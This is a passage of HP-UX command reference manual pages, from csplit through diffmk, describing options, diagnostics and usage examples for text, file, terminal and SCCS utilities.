counts for each file created).
-k Leave previously created files intact (csplit normally removes created files if an
error occurs).
-f prefix Name created files prefix00 through prefixNN (default is xx00 through xxNN).
-n number The output file name suffix will use number digits instead of the default 2. This
allows creation of more than 100 output files.
Arguments (arg1 through argn ) to csplit can be any combination of the following:
/regexp / Create a file containing the section from the current line up to (but not including)
the line matching the regular expression regexp . The new current line becomes the
line matching regexp .
/regexp /+n
/regexp /-n Create a file containing the section from the current line up to (but not including)
the nth before (-n) or after (+n) the line matching the regular expression regexp .
(e.g., /Page/-5). The new current line becomes the line matching regexp ±n lines.
%regexp % Equivalent to /regexp /, except that no file is created for the section.
line_number Create a file from the current line up to (but not including) line_number . The new
current line becomes line_number .
{num } Repeat argument. This argument can follow any of the above argument forms. If it
follows a regexp argument, that argument is applied num more times. If it follows
line_number , the file is split every line_number lines for num times from that point
until end-of-file is reached or num expires.
{* } Repeats previous operand as many times as necessary to finish input.
Enclose in appropriate quotes all regexp arguments containing blanks or other characters meaningful to
the shell. Regular expressions must not contain embedded newlines. csplit does not alter the original
file.
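A runnable sketch of the line_number and {num} forms (assumes a csplit with the -s and -f options described above, e.g. GNU or HP-UX csplit, and the seq utility):

```shell
#!/bin/sh
# Split a 10-line file before lines 3, 6, and 9: the argument 3 names a
# line number and {2} repeats the split at that interval two more times.
dir=$(mktemp -d /tmp/csplit_demo.XXXXXX)
cd "$dir"
seq 1 10 > input                  # lines "1" through "10"
csplit -s -f part input 3 '{2}'   # -s: suppress counts; -f: prefix "part"
wc -l part*                       # part00=2, part01=3, part02=3, part03=2
head -n 1 part01                  # prints 3 (first line of second piece)
cd / && rm -rf "$dir"
```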
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the collating sequence used in evaluating regular expressions.
LC_CTYPE determines the characters matched by character class expressions in regular expressions.
LC_MESSAGES determines the language in which messages are displayed.
If any internationalization variable contains an invalid setting, csplit behaves as if all internationalization
variables are set to "C". See environ (5).
DIAGNOSTICS
Messages are self explanatory except for:
arg - out of range
which means that the given argument did not reference a line between the current position and the end of
the file. This warning also occurs if the file is exhausted before the repeat count is.
EXAMPLES
Create four files, cobol00 through cobol03. After editing the ‘‘split’’ files, recombine them back into
the original file, destroying its previous contents.
csplit -f cobol file '/procedure division/' /par5./ /par16./
Perform editing operations
cat cobol0[0-3] > file
Split a file at every 100 lines, up to 10,000 lines (100 files). The -k option causes the created files to be
retained if there are fewer than 10,000 lines (an error message is still printed).
csplit -k file 100 '{99}'
Assuming that prog.c follows the normal C coding convention of terminating routines with a } at the
beginning of the line, create a file containing each separate C routine (up to 21) in prog.c.
csplit -k prog.c '%main(%' '/^}/+1' '{20}'
SEE ALSO
sh(1), split(1), environ(5), lang(5), regexp(5).
STANDARDS CONFORMANCE
csplit: SVID2, SVID3, XPG2, XPG3, XPG4
NAME
ct - spawn getty to a remote terminal (call terminal)
SYNOPSIS
ct [-w n] [-x n] [-h] [-v] [-s speed ] telno ...
DESCRIPTION
ct dials the telephone number of a modem that is attached to a terminal, and spawns a getty process to
that terminal.
-x n Produce detailed debugging output on the standard error; n is a single digit. The most use-
ful value is -x9.
-h Prevent ct from disconnecting ("hanging up") the current tty line. This option is
necessary if the user is using a different tty line than the one used by ct to spawn
the getty.
FILES
/var/adm/ctlog
/etc/uucp/Devices
SEE ALSO
cu(1), login(1), uucp(1), getty(1M), uugetty(1M).
NAME
ctags - create a tags file
SYNOPSIS
ctags [-xvFBatwu] files ...
DESCRIPTION
ctags makes a tags file for ex(1) (or vi (1)) from the specified C, Pascal, and FORTRAN sources. A tags file
gives the locations of specified objects (for C, functions, macros with arguments, and typedefs; for Pascal,
procedures and functions). Each line of the tags file contains the object name, the file in which it is
defined, and an address specification for the object definition. Specifiers are given in separate fields on
the line, separated by spaces or tabs. Using the tags file, ex can quickly find these objects' definitions.
-x Cause ctags to print a simple function index: a list of function names, the file and line
number where each is defined, and the text of that line.
The tag main is treated specially in C programs: the tag formed is created by prepending M to the begin-
ning of the name of the file, with any trailing .c removed, and leading pathname components also removed.
This makes use of ctags practical in directories with more than one program.
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the order in which the output is sorted.
LC_CTYPE determines the interpretation of the single- and/or multi-byte characters within comments
and string literals. If LANG is not specified or is null, a default of ‘‘C’’ (see lang (5)) is used instead of
LANG. If any internationalization variable contains an invalid setting, ctags behaves as if all
internationalization variables are set to ‘‘C’’. See environ (5).
DIAGNOSTICS
Duplicate entry in files file1 and file2 : name (Warning only).
The same name was detected in two different files. A tags entry was made only for the first name
found.
EXAMPLES
See the -t option of ex(1) and vi(1) for editing with a tags file.
If more than one (function) definition appears on a single line, only the first definition is indexed.
AUTHOR
ctags was developed by the University of California, Berkeley.
FILES
tags output tags file
OTAGS temporary file used by -u
SEE ALSO
ex(1), vi(1).
STANDARDS CONFORMANCE
ctags: XPG4
cu(1) cu(1)
NAME
cu - call another (UNIX) system; terminal emulator
SYNOPSIS
cu [-s speed ] [-l line ] [-h] [-q] [-t] [-d level ] [-e | -o] [-m] [-n] [ telno | systemname | dir ]
XPG4 Syntax:
cu [-s speed ] [-l line ] [-h] [-q] [-t] [-d] [-e | -o] [-m] [-n] [ telno | systemname | dir ]
DESCRIPTION
cu calls up another system, which is usually a UNIX operating system, but can be a terminal or a non-
UNIX operating system. cu manages all interaction between systems, including possible transfers of
ASCII files.
Options
-l line Specify a device name to use as the communication line. This can be used to over-
ride searching for the first available line having the right speed. The specified dev-
ice is usually a directly connected asynchronous line (such as /dev/ttyapb). In
this case, a telephone number is not required, but the string dir can be used to
specify that a dialer is not required. If the specified device is associated with an
auto-dialer, a telephone number must be provided.
-h Emulate local echo, supporting calls to other computer systems that expect termi-
nals to be set to half-duplex mode.
-q Use ENQ/ACK handshake (remote system sends ENQ, cu sends ACK.)
-t Used when dialing an ASCII terminal that has been set to auto-answer. Appropri-
ate mapping of carriage-return to carriage-return-line-feed pairs is set.
-d level Print diagnostic traces. level is a number from 0 to 9; higher levels give more
detailed information.
systemname Call the system known as systemname. cu tries each tele-
phone number or direct line for systemname in the Systems file until a connection
is made or all the entries are tried.
dir Using dir ensures that cu uses the line specified by the -l option.
After making the connection, cu runs as two processes:
• transmit process reads data from the standard input and, except for lines beginning with ˜,
passes it to the remote system;
• receive process accepts data from the remote system and, except for lines beginning with ˜,
passes it to the standard output.
Normally, an automatic DC3/DC1 protocol is used to control input from the remote to ensure that the
buffer is not overrun. "Prompt handshaking" can be used to control transfer of ASCII files to systems that
have no type-ahead capability but require data to be sent only after a prompt is given. This is described
in detail below. Lines beginning with ˜ have special meanings.
Ctrl-X form where a circumflex (ASCII 94) precedes the character, as in ˆX. A null
character can be specified with ˆ@. (A null first character in the prompt implies a
"null" prompt, which always appears to be satisfied.) A circumflex is specified by
ˆˆ.
~%>[>]file Divert output from the remote system to the specified file until another ˜%> com-
mand is given. When an output diversion is active, typing ˜%> terminates it,
whereas ˜%> anotherfile terminates it and begins a new one. The output diversion
remains active through a ˜& subshell, but unpredictable results can occur if
input/output diversions are intermixed with ˜%take or ˜%put. The ˜%>> com-
mand appends to the named file. Note that these commands, which are interpreted
by the transmit process, are unrelated to the ˜> commands described below, which
are interpreted by the receive process.
~susp Suspend the cu session. susp is the suspend character set in the terminal when
cu was invoked (usually ˆZ — see stty (1)). As in all other lines starting with tilde,
a ˜susp line must be terminated by pressing Return.
Receive Process
The receive process normally copies data from the remote system to its standard output. A line from the
remote that begins with ˜> initiates an output diversion to a file. The complete sequence is:
~>[>]: file
zero or more lines to be written to file
~>
Data from the remote is diverted (or appended, if >> is used) to file . The trailing ˜> terminates the
diversion.
The use of ˜%put requires stty (1) and cat (1) on the remote side. It also requires that the current erase
and kill characters on the remote system be identical to the current ones on the local system.
Backslashes are inserted at appropriate places.
When cu is used on system X to connect to system Y, and then from Y to system Z, a line beginning with
˜˜ is interpreted on Y rather than on X. For example, using the keyboard on system X, uname can be
executed on Z, X, and Y as follows, where lines 1, 3, and 5 are keyboard commands,
and lines 2, 4, and 6 are system responses:
uname
Z
~!uname
X
~˜!uname
Y
In general, ˜ causes the command to be executed on the original machine; ˜˜ causes the command to be
executed on the next machine in the chain.
EXTERNAL INFLUENCES
If any internationalization variable contains an invalid setting, cu behaves as if all international-
ization variables are set to "C". See environ (5).
DIAGNOSTICS
Exit code is zero for normal exit; non-zero (various values) otherwise.
EXAMPLES
To dial the telephone number 2015551212 using the line /dev/culXpX:
cu -l/dev/culXpX 2015551212
To use a system name (yyyzzz):
cu yyyzzz
To connect directly to a modem:
cu -l/dev/culXX -m dir
WARNINGS
cu buffers input internally.
AUTHOR
cu was developed by AT&T and HP.
FILES
/etc/uucp/Systems
/etc/uucp/Devices
/etc/uucp/Dialers
/var/spool/locks/LCK..(tty-device)
/dev/null
SEE ALSO
cat(1), ct(1), echo(1), stty(1), uname(1), uucp(1), uuname(1).
STANDARDS CONFORMANCE
cu: SVID2, SVID3, XPG2, XPG3, XPG4
NAME
cut - cut out (extract) selected fields of each line of a file
SYNOPSIS
cut -c list [ file ... ]
cut -b list [-n] [ file ... ]
cut -f list [-d char ] [-s] [ file ... ]
DESCRIPTION
cut cuts out (extracts) columns from a table or fields from each line of a file, as specified by list.
Options are interpreted as follows:
list A comma-separated list of integer byte (-b option), character (-c option), or field (-f
option) numbers, in increasing order, with optional - to indicate ranges. For exam-
ple, 1-3,8 means positions 1 through 3 and 8; -5,10 is short for 1-5,10; and 3- is
short for position 3 through the last. With -f, fields are assumed to be separated by
a delimiter character (see -d); for example, -f 1,7 copies the first and seventh field
only. Lines with no field delimiters will be passed through intact (useful for table
subheadings), unless -s is specified.
-d char The character following -d is the field delimiter (-f option only). Default is tab .
Space or other characters with special meaning to the shell must be quoted. Adja-
cent field delimiters delimit null fields. char may be an international code set char-
acter.
-n Do not split characters (-b option only). A multi-byte character is written only if
all of its bytes are selected by list; otherwise it is omitted from the output.
-s Suppresses lines with no delimiter characters when using -f option. Unless -s is
specified, lines with no delimiters appear in the output without alteration.
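The list, -d, and -s behavior described above can be sketched with a few pipelines (the sample input lines are invented for illustration):

```shell
# Extract the second :-separated field of each line (-f with -d).
printf 'alice:x:1001\nbob:x:1002\n' | cut -d : -f 2
# Select character positions 1-3 (-c with a range).
printf 'abcdef\n' | cut -c 1-3
# With -s, the line lacking the delimiter is suppressed entirely.
printf 'a:b\nnodelim\n' | cut -d : -f 1 -s
```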
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of text as single- and/or multi-byte characters. If LC_CTYPE
is not specified in the environment or is null, it defaults to the value of LANG. If LANG is not specified
or is null,
a default of "C" (see lang (5)) is used instead of LANG. If any internationalization variable contains an
invalid setting, cut behaves as if all internationalization variables are set to "C". See environ (5).
EXAMPLES
Password file mapping of user ID to user names:
cut -d : -f 1,5 /etc/passwd
Set environment variable name to current login name:
name=‘who am i | cut -f 1 -d " "‘
WARNINGS
cut does not expand tabs. Pipe text through expand (1) if tab expansion is required.
Backspace characters are treated the same as any other character. To eliminate backspace characters
before processing by cut, use the fold or col command (see fold (1) and col (1)).
AUTHOR
cut was developed by OSF and HP.
SEE ALSO
grep(1), paste(1).
STANDARDS CONFORMANCE
cut: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
NAME
date - display or set the date
SYNOPSIS
date [-u] [mmddhhmm[[cc]yy]]
date [-u] +format
DESCRIPTION
date recognizes the forms below. Some formatting directives are valid for all languages except the C
default language. See Formatting Directives and EXAMPLES below.
date [-u] +format
Display the current date and time according to formatting directives specified in format ,
which is a string of zero or more formatting directives and ordinary characters. If it con-
tains blanks, enclose it in apostrophes or quotation marks.
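As a sketch of the +format form (the directive names are the usual strftime-style ones, e.g. %Y for the year):

```shell
# Display the current UTC date as year-month-day.
date -u '+%Y-%m-%d'
# A format string containing blanks must be quoted.
date -u '+Today is %A'
```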
An optional field width can follow the % of a directive; a width with a leading zero pads the field with
zeros, for example, 02.
Obsolescent Directives
The following directives are provided for backward compatibility. It is recommended that the preceding
directives be used instead.
DIAGNOSTICS
The following messages may be displayed.
bad conversion
The date/time specification is syntactically incorrect. Check it against the usage and for the
correct range of each of the digit-pairs.
bad format character - c
The character c is not a valid format directive, field width specifier, or precision specifier.
do you really want to run time backwards?[yes/no]
The date/time you specified is earlier than the current clock value. Type yes (or the equivalent
affirmative response for your language) to set the clock backward; any other response leaves the
clock unchanged.
EXAMPLES
Display Date
date → Fri Aug 20 15:03:37 PDT 1993 ← C (default)
date -u → Fri Aug 20 22:03:37 UTC 1993 ← C (default)
date → Fri, Aug 20, 1993 03:03:37 PM ← en_US.roman8 (U.S. English)
date → Fri. 20 Aug, 1993 03:03:37 PM ← en_GB.roman8 (U.K. English)
date → 20/08/1993 15.47.47 ← pt_PT.roman8 (Portuguese)
Set Date
Set the date to Oct 8, 12:45 a.m.
date 10080045
WARNINGS
The former HP-UX format directive A has been changed to W for ANSI compatibility.
Changing the date while the system is running in multiuser mode should be avoided to prevent disrupt-
ing time-dependent processes and timestamps.
SEE ALSO
locale(1), stime(2), ctime(3C), strftime(3C), tztab(4), environ(5), lang(5), langinfo(5).
STANDARDS CONFORMANCE
date: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
NAME
dc - desk calculator
SYNOPSIS
dc [ file ]
DESCRIPTION
dc is an arbitrary-precision desk calculator. Ordinarily it operates on decimal integers, but an input
base, output base, and a number of fractional digits to be maintained can be specified. The overall
structure of dc is a stacking (reverse Polish) calculator. If a file argument is given, input is taken from
that file until end-of-file, then from the standard input. An end of file on standard input or the q
command stops dc. The following constructions are recognized:
number The value of the number is pushed on the stack. A number is an unbroken string of
the digits 0-9 or A-F. It can be preceded by an underscore (_) to input a negative
number. Numbers can contain decimal points.
+ - / * % ˆ
The top two values on the stack are added (+), subtracted (-), multiplied (*),
divided (/), remaindered (%), or exponentiated (ˆ). The two entries are popped off
the stack; the result is pushed on the stack in their place. Any fractional part of an
exponent is ignored and a warning generated. The remainder is calculated according
to the current scale factor.
sx The top of the stack is popped and stored in a register named x, where x can be any
character.
lx The value in register x is pushed on the stack; the register is not altered. All regis-
ters start with zero value.
p The top value on the stack is printed; the top value remains unchanged.
P Interprets the top of the stack as an ASCII string, removes it, and prints it.
f All values on the stack are printed.
q Exits the program. If executing a string, the recursion level is popped by two. If q
is capitalized, the top value on the stack is popped and the string execution level is
popped by that value.
[ ... ] Puts the bracketed ASCII string on the top of the stack. Strings can be nested by
using nested pairs of brackets.
<x >x =x
The top two elements of the stack are popped and compared. Register x is executed
if they obey the stated relation.
! Interprets the rest of the line as an HP-UX system command (unless the next charac-
ter is <, >, or =, in which case the appropriate relational operator above is used).
c All values on the stack are popped.
i The top value on the stack is popped and used as the number radix for further
input.
DIAGNOSTICS
Nesting Depth There are too many levels of nested execution.
EXAMPLES
This example prints the first ten values of n! (n factorial):
[la1+dsa*pla10>y]sy
0sa1
lyx
SEE ALSO
bc(1).
DC: An Interactive Desk Calculator tutorial in Number Processing Users Guide.
NAME
dd - convert, reblock, translate, and copy a (tape) file
SYNOPSIS
dd [option =value ] ...
DESCRIPTION
dd copies the specified input file to the specified output file with possible conversions. The standard
input and output are used by default. Input and output block size can be specified to take advantage of
raw physical I/O. Upon completion, dd reports the number of whole and partial input and output
records.
Options
dd recognizes the following option =value pairs:
if=file Input file name; default is standard input.
of=file Output file name; default is standard output. The output file is created using the
same owner and group used by creat().
ibs=n Input block size is n bytes; default is 512.
obs=n Output block size is n bytes; default is 512.
bs=n Set both input and output block size to the same size, superseding ibs and obs.
This option is particularly efficient if no conversion (conv option) is specified,
because no in-core copy is necessary.
cbs=n Conversion buffer size is n bytes.
skip=n Skip n input blocks before starting copy.
iseek=n Skip n input blocks before starting copy. (This is an alias for the skip option.)
seek=n Skip n blocks from beginning of output file before copying.
oseek=n Skip n blocks from beginning of output file before copying. (This is an alias for the
seek option.)
count=n Copy only n input blocks.
files=n Copy and concatenate n input files. This option should be used only when the input
file is a magnetic tape device.
conv=value [,value ...]
Where values are comma-separated symbols from the following list.
ascii Convert EBCDIC to ASCII.
ebcdic Convert ASCII to EBCDIC.
ibm Convert ASCII to EBCDIC using an alternate conversion table.
The ascii, ebcdic, and ibm values are mutually exclusive.
block Convert each newline-terminated or end-of-file-terminated input
record to a record with a fixed length specified by cbs. Any
newline character is removed, and space characters are used to
fill the block to size cbs. Lines that are longer than cbs are
truncated; the number of truncated lines (records) is reported
(see DIAGNOSTICS below).
The block and unblock values are mutually exclusive.
unblock Convert fixed-length input records to variable-length records.
For each input record, cbs bytes are read, trailing space char-
acters are deleted, and a newline character is appended.
lcase Map upper-case input characters to the corresponding lower-
case characters.
The lcase and ucase values are mutually exclusive.
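The conversions above can be sketched on the standard input, with no tape device involved (dd's record summary goes to standard error, discarded here):

```shell
# Map input to lower case while copying.
printf 'HELLO\n' | dd conv=lcase 2>/dev/null
# Round-trip a string through EBCDIC and back to ASCII.
printf 'data\n' | dd conv=ebcdic 2>/dev/null | dd conv=ascii 2>/dev/null
# Copy only the second 4-byte block of the input (skip=1, count=1).
printf 'aaaabbbbcccc' | dd bs=4 skip=1 count=1 2>/dev/null
```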
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
Environment Variables
The following environment variables affect execution of dd:
LANG determines the locale when LC_ALL and a corresponding variable (beginning with LC_) do not
specify a locale.
LC_ALL determines the locale used to override any values set by LANG or any environment variables
beginning with LC_.
The LC_CTYPE variable determines the locale for the interpretation of sequences of bytes of text data as
characters (single-byte/multi-byte characters, upper-case/lower-case characters).
The LC_MESSAGES variable determines the language in which messages are written.
RETURN VALUE
Exit values are:
0 Successful completion.
>0 Error condition occurred.
DIAGNOSTICS
Upon completion, dd reports the number of input and output records:
f +p records in Number of full and partial blocks read.
f +p records out Number of full and partial blocks written.
When conv=block is specified and there is at least one truncated block, the number of truncated
records is also reported:
n truncated records
EXAMPLES
Read an EBCDIC tape blocked ten 80-byte EBCDIC card images per block into an ASCII file named x:
WARNINGS
Some devices, such as 1/2-inch magnetic tapes, are incapable of seeking. Such devices may be positioned
prior to running dd by using mt(1) or some other appropriate command. The skip, seek, iseek, and
oseek options can be used only with devices or files that are capable of seeking.
The ebcdic conversion follows the commonly accepted standard table, whereas the ibm conversion, while
less widely accepted as a standard, corresponds better to certain IBM print train conventions. There is no
universal solution.
Newline characters are inserted only on conversion to ASCII; padding is done only on conversion to
EBCDIC. These should be separate options.
If if or of refers to a raw disk, bs should always be a multiple of the sector size of the disk. By default,
bs is 512 bytes. If the sector size of the disk is different from 512 bytes, bs should be specified using a
multiple of sector size. The character special (raw) device file should always be used for devices.
It is entirely up to the user to insure there is enough room in the destination file, file system and/or device
to contain the output since dd cannot pre-determine the required space after conversion.
SEE ALSO
cp(1), mt(1), tr(1), disk(7), mt(7).
STANDARDS CONFORMANCE
dd: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
NAME
delta - make a delta (change) to an SCCS file
SYNOPSIS
delta [-r SID ] [-s] [-n] [-g list ] [-m mrlist ] [-y comment ] [-p] files
DESCRIPTION
The delta command is used to permanently introduce into the named SCCS file changes that were made
to the file retrieved by get (called the g-file , or generated file). See get (1).
delta makes a delta to each named SCCS file. If a directory is named, delta behaves as though each
file in the directory was specified as a named file, except that non- SCCS files (last component of the path
name does not begin with .s) and unreadable files are silently ignored. If a name of - is given, the stan-
dard input is read (see WARNINGS). Each line of the standard input is taken to be the name of an SCCS
file to be processed.
delta may issue prompts on the standard output, depending upon certain options specified and flags
(see admin (1)) that may be present in the SCCS file (see the -m and -y options below).
Options
Option arguments apply independently to each named file.
-rSID Uniquely identifies which delta is to be made to the SCCS file. Use of this option is
necessary only if two or more outstanding gets for editing (get -e) on the same
SCCS file were done by the same person (login name). The SID value specified with
the -r option can be either the SID specified on the get command line or the SID to
be made as reported by the get command (see get (1)). A diagnostic results if the
specified SID is ambiguous, or, if necessary and omitted on the command line.
-s Suppresses issuing, on the standard output, of the created delta’s SID as well as the
number of lines inserted, deleted and unchanged in the SCCS file.
-n Specifies retention of the edited g-file (normally removed at completion of delta pro-
cessing).
-glist Specifies a list (see get (1) for the definition of list ) of deltas which are to be ignored
when the file is accessed at the change level (SID ) created by this delta.
-m[mrlist] If the SCCS file has the v flag set (see admin (1)), a Modification Request (MR)
number must be supplied as the reason for creating the new delta. If -m is not
used and the standard input is a terminal, the prompt MRs? is issued on the
standard output before the standard input is read; if the standard input is not a
terminal, no prompt is issued. The MRs? prompt always precedes the comments?
prompt (see the -y option).
MRs in a list are separated by blanks and/or tab characters. An unescaped new-line
character terminates the MR list.
Note that if the v flag has a value (see admin (1)), it is assumed to be the name of a
program (or shell procedure) that is to validate the correctness of the MR numbers.
If a non-zero exit status is returned from the MR number-validation program,
delta assumes that the MR numbers were not all valid and terminates.
-y[comment] Arbitrary text used to describe the reason for making the delta. A null string is
considered a valid comment .
If -y is not specified and the standard input is a terminal, the prompt comments?
is issued on the standard output before the standard input is read. If the standard
input is not a terminal, no prompt is issued. An unescaped new-line character ter-
minates the comment text.
-p Causes delta to print (on the standard output in a diff(1) format) the SCCS file
differences before and after the delta is applied.
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of text as single- and/or multi-byte characters.
DIAGNOSTICS
Use sccshelp (1) for explanations.
WARNINGS
SCCS files can be any length, but the number of lines in the text file itself cannot exceed 99,999 lines.
Lines beginning with an ASCII SOH character (octal 001) cannot be placed in the SCCS file unless the SOH
is escaped. This character has special meaning to SCCS (see sccsfile (4)) and will cause an error.
A get of many SCCS files, followed by a delta of those files, should be avoided when the get generates
a large amount of data. Instead, multiple get/delta sequences should be used.
If the standard input (-) is specified on the delta command line, the -m (if necessary) and -y options
must also be present. Omission of these options causes an error.
Comments can be of multiple lines. The maximum length of the comment (total length of all comment
lines) cannot exceed 1024 bytes. No line in a comment should have a length of more than 1000 bytes.
FILES
All of the auxiliary files listed below, except for the g-file , are created in the same directory as the s-file
(see get (1)). The g-file is created in the user’s working directory.
g-file Existed before the execution of delta; removed after completion of delta
(unless -n was specified).
p-file Existed before the execution of delta; may exist after completion of delta.
q-file Created during the execution of delta; removed after completion of delta.
x-file Created during the execution of delta; renamed to SCCS file after completion of
delta.
z-file Created during the execution of delta; removed during the execution of
delta.
d-file Created during the execution of delta; removed after completion of delta.
/usr/bin/bdiff Program to compute differences between the file retrieved by get and the g-file .
SEE ALSO
admin(1), bdiff(1), cdc(1), get(1), sccshelp(1), prs(1), rmdel(1), sccsfile(4).
STANDARDS CONFORMANCE
delta: SVID2, SVID3, XPG2, XPG3, XPG4
NAME
deroff - remove nroff, tbl, and neqn constructs
SYNOPSIS
deroff [-mx ] [-w] [-i] [ file ... ]
DESCRIPTION
deroff reads each file in sequence and removes all nroff requests, macro calls, backslash constructs,
neqn constructs (between .EQ and .EN lines, and between delimiters — see neqn(1)), and tbl descrip-
tions (see tbl (1)), replacing them with white space (blanks and blank lines), and writes the remainder of
the file on the standard output. deroff follows chains of included files (.so and .nx nroff/troff
formatter commands); if a file has already been included, a .so naming that file is ignored and a .nx
naming that file terminates execution. If no input file is given, deroff reads the standard input.
The -m option can be followed by an m, s, or l. The -mm option causes the macros be interpreted such
that only running text is output (that is, no text from macro lines). The -ml option forces the -mm
option and also causes deletion of lists associated with the mm macros.
If the -w option is given, the output is a word list, one ‘‘word’’ per line, with all other characters deleted.
Otherwise, the output follows the original, with the deletions mentioned above. In text, a ‘‘word’’ is any
multi-byte character string or any string that contains at least two letters and is composed of letters,
digits, ampersands (&), and apostrophes (’); In a macro call, however, a ‘‘word’’ is a multi-byte character
string or a string that begins with at least two letters and contains a total of at least three letters. Delim-
iters are any characters other than letters, digits, apostrophes, and ampersands. Trailing apostrophes
and ampersands are removed from ‘‘words.’’
If the -i option is specified, deroff ignores the .so and .nx nroff/troff commands.
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of text and filenames as single and/or multi-byte characters.
Note that multi-byte punctuation characters are not recognized when using the -w option. If any
internationalization variable contains an invalid setting, deroff behaves as if all internationali-
zation variables are set to "C". See environ (5).
WARNINGS
deroff is not a complete nroff interpreter; thus it can be confused by subtle constructs. Most such
errors result in too much rather than too little output.
The -ml option does not handle nested lists correctly.
AUTHOR
deroff was developed by the University of California, Berkeley.
SEE ALSO
neqn(1), nroff(1), tbl(1).
NAME
dhcpv6client_ui - DHCPv6 client interface for requesting configuration parameters from the DHCPv6
server.
DESCRIPTION
dhcpv6client_ui is the interface through which a user contacts the client daemon to obtain IP
addresses and other configuration parameters from the server. The default configuration parameters are
specified as command line options when the DHCPv6 client daemon is invoked.
When dhcpv6client_ui requests IP addresses or other configuration parameters, the client daemon
can return the parameters it has already obtained for the specified interface instead of requesting new IP
addresses from the server.
This option must be used in conjunction with the -m option.
RETURN VALUES
dhcpv6client_ui returns 0 on success and 1 on failure.
EXAMPLES
dhcpv6client_ui obtains two IP addresses for the lan0 interface:
dhcpv6client_ui -m lan0 -n 2
dhcpv6client_ui obtains two IP addresses for the lan0 interface and additional configuration
parameters:
dhcpv6client_ui -m lan0 -n 2 -o dns_sa dns_sx
FILES
/etc/dhcpv6client.data All the data obtained from the server daemon is saved to this file.
AUTHOR
dhcpv6client_ui was developed by Hewlett-Packard.
SEE ALSO
dhcpv6clientd(1M), dhcpv6d(1M).
When both arguments are directories, diff runs the regular file diff algorithm (described below) on text
files that have the same name in each directory but
are different. Binary files that differ, common subdirectories, and files that appear in only one directory
are listed. When comparing directories, the following options are recognized:
When run on regular files, and when comparing text files that differ during directory comparison, diff
tells what lines must be changed in the files to bring them into agreement. diff usually finds a smallest
sufficient set of file differences. The output-format options described below are mutually exclusive.
-Dstring Creates a merged version of file1 and file2 on the standard output, with C preprocessor con-
trols included so that a compilation of the result without defining string is equivalent to
compiling file1, while compiling the result with string defined is equivalent to compiling file2.
If any internationalization variable contains an invalid setting, diff behaves as if all inter-
nationalization variables are set to "C". See environ (5).
RETURN VALUE
Upon completion, diff returns with one of the following exit values:
0 No differences were found.
1 Differences were found.
>1 An error occurred.
EXAMPLES
Compare two files, ignoring differences in whitespace and in letter case:
diff -wi x1 x2
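The exit values above can be checked directly; the scratch files here are created only for the demonstration:

```shell
# Two one-line files that differ in content.
printf 'apple\n'   > /tmp/diff_demo_a
printf 'apricot\n' > /tmp/diff_demo_b
# diff returns 1 when differences are found.
diff /tmp/diff_demo_a /tmp/diff_demo_b >/dev/null || echo "exit status: $?"
rm -f /tmp/diff_demo_a /tmp/diff_demo_b
```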
AUTHOR
diff was developed by AT&T, the University of California, Berkeley, and HP.
NAME
diff3 - 3-way differential file comparison
SYNOPSIS
diff3 [-exEX3] file1 file2 file3
DESCRIPTION
diff3 compares three versions of a file, and prints disagreeing ranges of text flagged with these codes:
==== all three files differ
====1 file1 is different
====2 file2 is different
====3 file3 is different
The type of change required to convert a given range of a given file to some other is indicated in one of
these ways:
f :n1 a Text is to be appended after line number n1 in file f, where f = 1, 2, or 3.
f :n1 ,n2 c Text is to be changed in the range line n1 through line n2. If n1 = n2, the range
can be abbreviated to n1.
The original contents of the range follows immediately after a c indication. When the contents of two
files are identical, the contents of the lower-numbered file is suppressed.
-e Produces a script for the ed editor that can be used to incorporate into file1 all
changes between file2 and file3 (see ed(1)); i.e., the changes that normally would be
flagged ==== and ====3.
-x Produces a script to incorporate only changes flagged ====.
-3 Produces a script to incorporate only changes flagged ====3.
-E Produces a script that will incorporate all changes between file2 and file3 , but treat over-
lapping changes (that is, changes that would be flagged with ==== in normal listing)
differently. The overlapping lines in both files will be inserted by the edit script bracketed
by <<<<<< and >>>>>> lines.
-X Produces a script that will incorporate only changes flagged ==== , but treat these
changes in the manner of -E option.
The following command applies the resulting script to file1 .
(cat script; echo ’1,$p’) | ed - file1
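A minimal sketch on three scratch versions of a file, where only the second copy differs, produces a range flagged ====2:

```shell
printf 'one\ntwo\n' > /tmp/d3_f1
printf 'one\nTWO\n' > /tmp/d3_f2
printf 'one\ntwo\n' > /tmp/d3_f3
# Only file2 disagrees, so the differing range is flagged ====2.
diff3 /tmp/d3_f1 /tmp/d3_f2 /tmp/d3_f3 || true
rm -f /tmp/d3_f1 /tmp/d3_f2 /tmp/d3_f3
```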
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
WARNINGS
Text lines that consist of a single period (.) defeat -e.
Files longer than 64K bytes do not work.
FILES
/var/tmp/d3*
/usr/lbin/diff3prog
SEE ALSO
diff(1).
NAME
diffmk - mark changes between two different versions of a file
SYNOPSIS
diffmk prevfile currfile markfile
DESCRIPTION
diffmk compares the previous version of a file with the current version and creates a file that includes
nroff/troff ‘‘change mark’’ commands. prevfile is the name of the previous version of the file and
currfile is the name of the current version of the file. diffmk generates markfile which contains all the
lines of the currfile plus inserted formatter ‘‘change mark’’ (.mc) requests. When markfile is formatted,
changed or inserted text is shown by a | character at the right margin of each line. The position of
deleted text is shown by a single *.
If the characters | and * are inappropriate, a copy of diffmk can be edited to change them because
diffmk is a shell script.
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
EXAMPLES
A typical command line for comparing two versions of an nroff/troff file and generating a file with
the changes marked is:
diffmk prevfile currfile markfile; nroff markfile | pr
diffmk can also be used to produce listings of C (or other) programs with changes marked. A typical
command line for such use is:
diffmk prevfile.c currfile.c markfile.c; nroff macs markfile.c | pr
where the file macs contains:
.pl 1
.ll 77
.nf
.eo
The .ll request can specify a different line length, depending on the nature of the program being
printed. The .eo request is probably needed only for C programs.
WARNINGS
Aesthetic considerations may dictate manual adjustment of some output.
diffmk does not differentiate between changes in text and changes in formatter request coding. Thus,
file differences involving only formatting changes (such as replacing .sp with .sp 2 in a text source file)
with no change in actual text can produce change marks.
Although unlikely, certain combinations of formatting requests can cause change marks to either disap-
